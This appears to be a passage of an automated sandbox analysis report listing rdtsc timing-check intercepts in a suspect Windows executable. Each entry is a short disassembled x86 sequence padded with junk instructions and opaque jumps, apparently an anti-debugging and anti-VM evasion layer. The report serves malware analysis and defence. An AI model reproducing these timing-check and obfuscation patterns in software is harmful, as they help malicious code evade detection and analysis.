Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4BFC second address: 9E4C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4D5B second address: 9E4D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4D5F second address: 9E4DA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE9A87AE1EFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FE9A87AE1F0h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FE9A87AE1EAh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 ja 00007FE9A87AE21Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4DA5 second address: 9E4DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 jmp 00007FE9A929865Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4DCB second address: 9E4DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50C5 second address: 9E50CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50CB second address: 9E50D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50D1 second address: 9E50D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E50D7 second address: 9E50E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E6854 second address: 9E6871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE9A9298661h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF549 second address: 9AF58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1EFh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FE9A87AE1F0h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE9A87AE1F5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA214 second address: 9EA223 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA223 second address: 9EA22D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA443 second address: 9EA450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FE9A9298656h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E9360 second address: 9E9364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEB9D second address: 9EEBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEBA1 second address: 9EEBA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F38FA second address: 9F3900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3900 second address: 9F391B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE9A87AE1E6h 0x0000000a popad 0x0000000b jmp 00007FE9A87AE1F0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F391B second address: 9F3922 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2D5C second address: 9F2D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F31B4 second address: 9F31B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3468 second address: 9F346C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35CA second address: 9F35D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35D4 second address: 9F35E7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A87AE1E6h 0x00000008 jno 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35E7 second address: 9F35F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE9A9298656h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F379B second address: 9F37B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A87AE1F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37B0 second address: 9F37B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F37B6 second address: 9F37F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FE9A87AE205h 0x0000000d jmp 00007FE9A87AE1F9h 0x00000012 jnl 00007FE9A87AE1E6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b jmp 00007FE9A87AE1ECh 0x00000020 jbe 00007FE9A87AE1ECh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F407B second address: 9F407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F407F second address: 9F408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FE9A87AE1E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F408D second address: 9F4091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F43A0 second address: 9F43A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F4549 second address: 9F4553 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F522E second address: 9F5232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F603B second address: 9F604C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F604C second address: 9F6051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6051 second address: 9F60EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE9A9298656h 0x00000009 jmp 00007FE9A9298669h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE9A9298658h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3B02h] 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov eax, dword ptr [ebp+122D3AE2h] 0x0000003b jg 00007FE9A929865Ch 0x00000041 popad 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FE9A9298658h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov si, EB23h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FE9A9298658h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F84AB second address: 9F84B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F9FF3 second address: 9FA005 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FE9A929865Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA005 second address: 9FA058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 js 00007FE9A87AE1E6h 0x0000000d jmp 00007FE9A87AE1F6h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE9A87AE1F5h 0x0000001c jmp 00007FE9A87AE1F6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA6CC second address: 9FA6F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9A9298668h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA6F7 second address: 9FA6FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FAE9E second address: 9FAEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBAB3 second address: 9FBB24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jne 00007FE9A87AE1F2h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FE9A87AE1E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov esi, ecx 0x00000030 jmp 00007FE9A87AE1ECh 0x00000035 push 00000000h 0x00000037 or dword ptr [ebp+122D17F8h], esi 0x0000003d push eax 0x0000003e pushad 0x0000003f push edi 0x00000040 pushad 0x00000041 popad 0x00000042 pop edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBB24 second address: 9FBB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB8F6 second address: 9FB8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBB28 second address: 9FBB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF813 second address: 9FF833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1F6h 0x00000009 jnc 00007FE9A87AE1E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF833 second address: 9FF837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB1B4 second address: 9BB1C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE9A87AE1EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB1C8 second address: 9BB1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00ACC second address: A00B64 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A87AE1ECh 0x00000008 jns 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push esi 0x00000012 push edx 0x00000013 mov ebx, 65C1AC96h 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+12455936h], ebx 0x00000028 sbb di, 2821h 0x0000002d popad 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 xor dword ptr [ebp+1244EF36h], eax 0x0000003b mov eax, dword ptr [ebp+122D118Dh] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FE9A87AE1E8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D304Ch] 0x00000061 or di, D797h 0x00000066 push FFFFFFFFh 0x00000068 mov ebx, esi 0x0000006a push eax 0x0000006b pushad 0x0000006c jmp 00007FE9A87AE1F6h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FE9A87AE1F0h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01940 second address: A01945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00B64 second address: A00B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056BD second address: A056C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A039B0 second address: A039BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FE9A87AE1E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01945 second address: A019B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FE9A9298658h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2A10h], eax 0x0000002c push dword ptr fs:[00000000h] 0x00000033 add ebx, dword ptr [ebp+122D34B3h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D35DDh] 0x00000046 clc 0x00000047 mov eax, dword ptr [ebp+122D0125h] 0x0000004d sub dword ptr [ebp+122D35DDh], eax 0x00000053 push FFFFFFFFh 0x00000055 push ecx 0x00000056 mov bl, 1Bh 0x00000058 pop ebx 0x00000059 cld 0x0000005a nop 0x0000005b pushad 0x0000005c push edi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056C1 second address: A056D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9A87AE1EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056D7 second address: A0573F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jno 00007FE9A9298662h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3522h], edi 0x00000014 push 00000000h 0x00000016 or edi, dword ptr [ebp+122D3992h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FE9A9298658h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 xor ebx, dword ptr [ebp+122D18CFh] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FE9A9298669h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0573F second address: A05745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05745 second address: A05749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05749 second address: A05766 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A87AE1EEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05899 second address: A058CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298669h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9A9298661h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05992 second address: A059BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9A87AE1F1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0756C second address: A0758D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0679B second address: A067AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE9A87AE1E8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A085B9 second address: A085BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A085BD second address: A085EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a adc di, 475Ch 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D386Ah] 0x00000019 add edi, dword ptr [ebp+122D3B7Eh] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FE9A87AE1EBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A623 second address: A0A629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A629 second address: A0A6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007FE9A87AE1ECh 0x00000011 add edi, dword ptr [ebp+122D304Ch] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FE9A87AE1E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+124552DAh], esi 0x00000039 pushad 0x0000003a jbe 00007FE9A87AE1ECh 0x00000040 mov edi, dword ptr [ebp+12455A74h] 0x00000046 mov esi, 18966D33h 0x0000004b popad 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push esi 0x00000051 call 00007FE9A87AE1E8h 0x00000056 pop esi 0x00000057 mov dword ptr [esp+04h], esi 0x0000005b add dword ptr [esp+04h], 0000001Ah 0x00000063 inc esi 0x00000064 push esi 0x00000065 ret 0x00000066 pop esi 0x00000067 ret 0x00000068 mov bh, 54h 0x0000006a xchg eax, esi 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e pushad 0x0000006f popad 0x00000070 jo 00007FE9A87AE1E6h 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A6B1 second address: A0A6D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FE9A9298666h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B74D second address: A0B778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE9A87AE1E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE9A87AE1F9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B8B4 second address: A0B8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B8B8 second address: A0B8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E771 second address: A0E7E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FE9A9298662h 0x0000000f nop 0x00000010 jne 00007FE9A929865Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FE9A9298658h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 sub bl, 00000065h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FE9A9298658h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov di, ax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E7E8 second address: A0E7FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E7FF second address: A0E804 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
